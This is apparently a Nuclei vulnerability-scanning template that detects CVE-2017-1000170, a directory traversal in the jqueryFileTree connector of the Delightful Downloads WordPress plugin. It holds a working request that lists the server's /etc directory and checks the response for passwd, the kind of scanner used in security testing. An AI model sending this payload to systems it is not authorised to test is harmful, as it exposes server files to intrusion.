32 lines
934 B
YAML
32 lines
934 B
YAML
id: CVE-2017-1000170
|
|
|
|
info:
|
|
name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
|
|
author: dwisiswant0
|
|
severity: high
|
|
reference: https://www.exploit-db.com/exploits/49693
|
|
description: jqueryFileTree 2.1.5 and older Directory Traversal
|
|
tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2017-1000170
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
|
|
body: "dir=%2Fetc%2F&onlyFiles=true"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<li class='file ext_passwd'>"
|
|
- "<a rel='/passwd'>passwd</a></li>"
|
|
condition: and
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|